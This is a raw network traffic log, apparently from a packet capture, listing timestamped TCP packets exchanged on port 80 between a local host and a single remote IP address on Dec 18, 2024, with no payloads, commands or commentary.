                                                                                                                                                                  Dec 18, 2024 11:09:46.668226004 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.668505907 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.668550968 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.668781996 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.668842077 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.670622110 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.670658112 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.670676947 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.670692921 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.670697927 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.670727968 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.670731068 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.670782089 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.672969103 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.673003912 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.673022985 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.673043013 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.673054934 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.673090935 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.673094988 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.673130035 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.674738884 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.674773932 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.674793959 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.674809933 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.674823999 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.674846888 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.675556898 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.675607920 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.676973104 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.677007914 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.677025080 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.677042961 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.677045107 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.677093029 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.677098036 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.677134037 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.678838015 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.678872108 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.678893089 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.678906918 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.678910017 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.678947926 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.679538965 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.679586887 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.683538914 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.683589935 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.816838980 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.816895962 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.817208052 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.817255974 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.817393064 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.817600012 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.817694902 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.817739964 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.817837000 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.817904949 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.818869114 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.818922043 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.818948984 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.819021940 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.819576025 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.819598913 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.819619894 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.819633961 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.820426941 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.820475101 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.820628881 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.820672989 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.821438074 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.821476936 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.822299004 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.822341919 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.822504997 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.822540045 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.822552919 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.822581053 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.823513031 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.823560953 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.823610067 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.823646069 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.824572086 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.824613094 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.824762106 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.824799061 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.825599909 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.825640917 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.826675892 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.826687098 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.826698065 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.826711893 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.826733112 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.827646017 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.827692032 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.827915907 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.827956915 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.828711987 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.828989983 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.829041004 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.829762936 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.829775095 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.829813957 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.829839945 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.830775023 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.830821037 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.831026077 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.831069946 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.831814051 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.831856966 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.831999063 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.832042933 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.832951069 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.832988024 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.832994938 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.833028078 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.833877087 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.833888054 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.833925962 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.834857941 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.834903002 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.835690022 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.835742950 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.835913897 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.835926056 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.835961103 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.836910009 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.836952925 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.837107897 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.837152958 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.838001966 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.838046074 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.838099003 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.838144064 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.838963985 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.839006901 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.839157104 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.839211941 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.840054989 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.840097904 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.840199947 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.840240002 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.841032028 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.841077089 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.841752052 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.841790915 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.842070103 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.842112064 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.842331886 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.842372894 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.843099117 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.843138933 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.843369961 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.843411922 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.844132900 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.844152927 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.844208002 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.845308065 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.845352888 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.846004963 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.846050978 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.846276045 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.846318007 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.846587896 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.846630096 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.847229958 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.847271919 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.847414970 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.847456932 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.848236084 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.848278999 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.848337889 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.848380089 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.849251986 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.849292994 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.850703001 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.850749016 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.850939035 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.850980043 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.851016045 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.851058006 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.851893902 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.851958036 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.852256060 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.852307081 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.852633953 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.852677107 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.853096008 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.853138924 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.853494883 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.853507042 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.853537083 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.854430914 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.854476929 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.854717016 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.854760885 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.855539083 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.855582952 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.856214046 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.856257915 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.856693029 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.856735945 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.857203007 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.857244968 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.857711077 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.857754946 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.858011961 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.858053923 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.858608007 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.858652115 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.858875990 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.858917952 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.859695911 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.859740019 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.859780073 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.859924078 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.860629082 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.860761881 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.861008883 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.861066103 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.861700058 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.861711025 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.861745119 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.861763954 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.862694025 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.862739086 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.863154888 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.863199949 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.863881111 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.863924026 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.863977909 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.864027023 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.864767075 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.864811897 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.864999056 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.865046024 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.865834951 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.865852118 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.865881920 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.865890980 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.866847992 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.866894960 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.867846966 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.867892981 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.868000031 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.868011951 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.868041992 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.868052959 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.868896961 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.868942976 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.869431973 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.869474888 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.870102882 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.870156050 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.870179892 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.870223045 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.007852077 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.007930040 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.007983923 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.008210897 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.008696079 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.008740902 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.009291887 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.009335041 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.009401083 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.010325909 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.010365009 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.010368109 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.011359930 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.011411905 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.011441946 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.011482000 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.012351036 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.012396097 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.012536049 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.012716055 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.013649940 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.013691902 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.013710022 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.013745070 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.014766932 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.015018940 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.015062094 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.015810966 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.016143084 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.016194105 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.016608953 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.016657114 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.016730070 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.016835928 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.018150091 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.018178940 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.018196106 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.018210888 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.018906116 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.018959045 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.019087076 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.019529104 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.019609928 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:47.019656897 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:47.020379066 CET804996631.41.244.11192.168.2.6
